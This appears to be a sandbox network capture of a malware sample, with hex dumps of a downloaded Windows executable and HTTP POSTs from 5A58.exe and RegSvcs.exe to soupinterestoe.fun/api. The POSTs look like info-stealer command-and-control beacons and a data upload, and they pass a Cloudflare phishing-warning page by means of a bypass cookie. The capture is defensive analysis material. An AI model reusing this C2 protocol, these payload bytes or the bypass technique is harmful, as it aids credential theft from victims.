c2 28 02 00 00 10 00 00 00 2a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 34 00 00 00 40 02 00 00 36 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 06 42 00 00 80 02 00 00 18 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 51 00 00 00 90 44 00 00 52 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELldB<@@Di(kdD@QA^@@.text( `.rdata~4@6.@@.data\|Bd@.rsrc@QDR\|@@
Dec 27, 2023 17:57:39.841101885 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8d 45 08 50 8b f1 e8 2f 28 00 00 c7 06 14 42 42 00 8b c6 5e 5d c2 04 00 cc cc cc cc c7 01 14 42 Data Ascii: UVEP/(BB^]BB(UVEtVC)^]UEQRUQR)]UEQRUQR8']ffh]B(UP
Dec 27, 2023 17:57:39.841183901 CET	1286	IN	Data Raw: 42 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 40 40 42 00 8b 45 fc 50 e8 79 fd ff ff 83 45 fc 08 83 6d f8 01 75 a2 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 c7 45 fc 00 00 00 00 81 45 fc 50 36 00 00 8b 45 fc 01 05 74 74 84 Data Ascii: Bjjjjjjj@@BEPyEmu_^[]UQEEP6Ett]QhB@BUdjh88BPd%= SVWjjEPjjj@Bjj@BMQjh\Bj@BURd@BujE#jj!
Dec 27, 2023 17:57:39.841203928 CET	1286	IN	Data Raw: cc cc 55 8b ec 8b 55 0c 8b 01 8b 40 1c 52 8b 55 08 6a ff 52 ff d0 5d c2 08 00 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 57 8b 7d 10 33 f6 89 4d fc 89 75 f8 85 ff 0f 8e 86 00 00 00 53 8b 5d 08 90 8b 45 fc e8 68 0b 00 00 85 c0 7e 32 3b f8 8b f0 Data Ascii: UU@RUjR]UVW}3MuS]Eh~2;}EVPEPSUu+u4MBEEUEuEFCuO[_^]_^]USW}3E~{VB~
Dec 27, 2023 17:57:39.841238022 CET	1286	IN	Data Raw: ff ff 84 c0 75 27 8d 45 08 e8 5e f2 ff ff 88 45 ff 8b c6 e8 04 06 00 00 8b d0 4a 8d 45 ff e8 09 f2 ff ff 84 c0 75 06 f6 46 40 02 75 43 83 c9 ff 8b d6 e8 25 06 00 00 8d 55 08 8d 45 f8 89 7d f8 e8 47 f2 ff ff 84 c0 75 13 8b c6 e8 cc 05 00 00 8b f0 Data Ascii: u'E^EJEuF@uC%UE}GuEEPG_^]'_^]Vu^Wk;s`_^F@uoltda8;w-9F<v
Dec 27, 2023 17:57:39.841250896 CET	1286	IN	Data Raw: 0c 56 8b f1 74 28 83 7e 18 10 72 22 8d 46 04 57 8b 38 85 db 76 0a 53 57 6a 10 50 e8 46 07 00 00 8b 46 18 40 50 57 8b ce e8 39 00 00 00 5f 53 8b ce c7 46 18 0f 00 00 00 e8 49 03 00 00 5e 5b 5d c2 08 00 cc cc cc 8b c1 c2 04 00 cc cc cc cc cc cc cc Data Ascii: Vt(~r"FW8vSWjPFF@PW9_SFI^[]UEP.]UM5]Udjh7BPd%VW}OH^BjEtY3G8M_d
Dec 27, 2023 17:57:39.841265917 CET	1286	IN	Data Raw: 5b 5d c2 08 00 e8 36 00 00 00 84 c0 74 28 8b 45 08 57 e8 99 fd ff ff 8b 4b 18 8d 04 70 50 51 8b c3 e8 8a 00 00 00 8b f0 e8 63 02 00 00 8b f7 8b c3 e8 3a ff ff ff 5f 5e 8b c3 5b 5d c2 08 00 cc e8 db 00 00 00 3b c7 73 05 e8 1e 07 00 00 39 7b 18 73 Data Ascii: []6t(EWKpPQc:_^[];s9{sCPWS3;uV3^3;)=]BwNH]Bv2xr@SV9wsG+;sv2+PHG+
Dec 27, 2023 17:57:39.841294050 CET	1286	IN	Data Raw: ff 75 08 e8 22 e3 ff ff 83 c4 10 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 73 ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec 51 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 b0 ff ff ff 83 c4 14 c9 c3 8b ff 55 8b ec 51 ff 75 fc ff 75 Data Ascii: u"]Uuuuus]UQuuuuuUQuuuuujp6B}uvu%3j[OMmU;sjX+;w4eFP)EME@ePEE.@}u]}vr
Dec 27, 2023 17:57:39.841327906 CET	1286	IN	Data Raw: ff ff 6a ff 6a 00 ff 75 08 8b ce e8 44 ff ff ff 8b c6 5e 5d c2 04 00 6a 04 b8 fc 36 42 00 e8 bb 0f 00 00 8b f1 89 75 f0 8b 7d 08 57 e8 81 05 00 00 83 65 fc 00 83 c7 0c 57 8d 4e 0c c7 06 20 42 42 00 e8 a5 ff ff ff 8b c6 e8 f9 0f 00 00 c2 04 00 8b Data Ascii: jjuD^]j6Bu}WeWN BBUVu,BB^]UVu8BB^]VjPdYY^V6b6YY^lBBUEVlBBtVY^]UEt
Dec 27, 2023 17:57:39.841352940 CET	1286	IN	Data Raw: 10 74 e0 39 45 0c 73 0e e8 d5 2d 00 00 6a 22 59 89 08 8b f1 eb d7 50 ff 75 10 ff 75 08 e8 bc 28 00 00 83 c4 0c 33 c0 5f 5e 5d c3 8b c1 83 60 04 00 83 60 08 00 c7 00 84 42 42 00 c3 8b ff 55 8b ec 53 8b 5d 08 56 57 8b f9 c7 07 84 42 42 00 8b 03 85 Data Ascii: t9Es-j"YPuu(3_^]``BBUS]VWBBt&PFVH.YYGt3VP-gG_^[]UMBB`H]US]VBBCFCWt1t'P(GW-YYFtsWP-
Dec 27, 2023 17:57:40.082743883 CET	1286	IN	Data Raw: 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 1a 42 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 04 42 00 00 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 c3 11 00 00 59 a3 68 86 84 00 ff 75 08 e8 b5 11 00 00 89 06 83 c6 04 56 e8 aa 11 00 00 Data Ascii: ;rPuBYYuG;r@PuBYYt1P4YhuVYdEY3_^[Vjj nAVhdujX^&3^jheBr><2euYEEE>2UuYH]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:49.641976118 CET	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soupinterestoe.fun
Dec 27, 2023 17:57:49.642014027 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 27, 2023 17:57:49.779403925 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oFQEdHvWfHwlBKL9yOs8txkTrXmnhwngPbq27bfAHGbHcxUd2dH1tPdd%2F8vfDCso%2FRitH2syOy%2Bdw%2FiARoBbpghQXA5CY9lzKBPwj4r9oE44BY%2F9LO2HidAYDjEhF9kUDb7%2BtWA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ad5ada93acf-DFW Data Raw: 31 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 Data Ascii: 1276<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.error
Dec 27, 2023 17:57:49.779421091 CET	1286	IN	Data Raw: 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e Data Ascii: s.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { wi
Dec 27, 2023 17:57:49.779433966 CET	1286	IN	Data Raw: 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 Data Ascii: al information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="GRB
Dec 27, 2023 17:57:49.779448032 CET	1286	IN	Data Raw: 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">83c31ad5ada93acf</strong></span> <span class="cf-footer-
Dec 27, 2023 17:57:49.779460907 CET	152	IN	Data Raw: 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 Data Ascii: --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 27, 2023 17:57:49.779474020 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 27, 2023 17:57:49.839238882 CET	349	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: soupinterestoe.fun
Dec 27, 2023 17:57:49.839310884 CET	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4c 47 4e 44 52 59 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=LGNDRY&j=default&ver=4.0
Dec 27, 2023 17:57:50.428467035 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=5kkvbbahtsu1qmpsdco06hp44k; expires=Sun, 21-Apr-2024 10:44:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fmJWYXLqmDcjHoIgca%2FhCyWBQT8eFBEYW09xqsv4rIRpYB6lc6karZjbN3z8nRCehJO9AtB1J6QB0pnj0NqeXGOtji%2FzXfKSrPs0pi%2F%2F2nfNR2gq7t0XRAvs9%2F8v225r2oHVBVA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ad Data Raw: Data Ascii:
Dec 27, 2023 17:57:50.428484917 CET	1286	IN	Data Raw: 65 65 66 38 33 61 63 66 2d 44 46 57 0d 0a 0d 0a 32 31 39 61 0d 0a 55 53 41 71 54 64 31 61 59 6a 6f 62 6e 37 6c 78 39 58 5a 4e 46 58 69 47 2b 51 6d 6f 4c 49 65 6d 49 6e 32 58 42 62 30 76 6d 44 51 71 4c 53 42 74 2f 58 70 43 47 47 32 39 67 31 48 42 Data Ascii: eef83acf-DFW219aUSAqTd1aYjobn7lx9XZNFXiG+QmoLIemIn2XBb0vmDQqLSBt/XpCGG29g1HBWkAfWKbZKYpf4oQYXeN3yEq0OVsACm39eANeOaWZF5QaPnBUi/MpiAynhEcFtT+ddJU+cQAKbf16GTcRv5lR1VZtNViknGeKFqeERxf1ZNFN+V8+UEYutTYFUn783RCZGyhwHeeTZ8FB78sAUZoPnQ+4FHEACm3/P
Dec 27, 2023 17:57:50.428499937 CET	1286	IN	Data Raw: 70 53 61 6e 68 67 4a 64 74 79 57 64 44 37 70 52 50 77 49 51 62 66 38 38 42 46 52 35 2b 74 55 58 6b 52 6b 6f 66 42 66 75 6e 47 66 44 52 75 37 45 54 42 44 32 59 64 64 47 2f 56 77 37 53 45 73 6e 76 33 68 4f 4e 78 47 2f 6d 56 48 56 56 6d 30 31 57 4b Data Ascii: pSanhgJdtyWdD7pRPwIQbf88BFR5+tUXkRkofBfunGfDRu7ETBD2YddG/Vw7SEsnv3hONxG/mVHVVm01WKScc4oWp4R7EuVq1A2VPnEACm39eh8WFpWZUdVWbTUDi/MpiAynhgJdtyfYQboOcQJAL7k7DVl1+tAYnBggfxrslW7JQO/FRxHwZ9hF9Vo4RAhh0FBCGju/mVHVVm9wAqTDKYpi7sBWBLUItw+4FHEACjDxV2gaO7+
Dec 27, 2023 17:57:50.428513050 CET	1286	IN	Data Raw: 38 51 38 57 6e 5a 53 2f 64 54 50 45 68 61 4a 37 45 31 43 31 64 79 37 39 73 65 6b 78 67 72 66 78 48 75 32 79 57 6c 4a 71 65 47 41 6c 32 33 4a 5a 30 50 75 6c 45 72 41 68 42 74 2f 77 30 4e 56 33 6e 2b 7a 56 50 34 66 47 30 31 57 4b 62 5a 4b 64 55 41 Data Ascii: 8Q8WnZS/dTPEhaJ7E1C1dy79sekxgrfxHu2yWlJqeGAl23JZ0PulErAhBt/w0NV3n+zVP4fG01WKbZKdUAiqwCXbclnQ/jOVsACm39ekIaO73cH9dMbTcW6ptkxkLuzEET+2DaRPJeIUNMJ742D1l9+N4XkBApeFqq9AOIDKeGAl23JZ9K4hZrAAgAmA1CeUO9tHvVVm01WKaEJaUmp4YCXbclxiKSFHEACm39ekIYfvGbS9VUI
Dec 27, 2023 17:57:50.586671114 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:50.969512939 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=v7bsebg01mg73iq8dbpcm15mq6; expires=Sun, 21-Apr-2024 10:44:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wE4KJVB841ACr1%2FBvzI1ClHf0iOqnSDlfwtJ1n0rzwacSm45pXBKM63v42MQM87VByNS8AKY5htb%2F70v8k7mjfQsfsSGYSgh75mKPU1FA7B%2Fiswkdh2PvRDigaafBC7TMYZbM0M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31adb9c1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:50.774293900 CET	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soupinterestoe.fun
Dec 27, 2023 17:57:50.774332047 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 27, 2023 17:57:50.907365084 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z7Okrr43jfk4OUCtg4ES28llBYh24l7CwEg4EaUzFaC9hfTqf%2FjBvUIC0YWUCyizQcnHjGCCTSuOCTkRHppJPK1MSfWukV12ikJe2l7KCvS2AbRizi%2BliPEfVo6DSbAkTgG3Scw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31adcbf3268fa-DFW Data Raw: 31 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f Data Ascii: 1276<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /
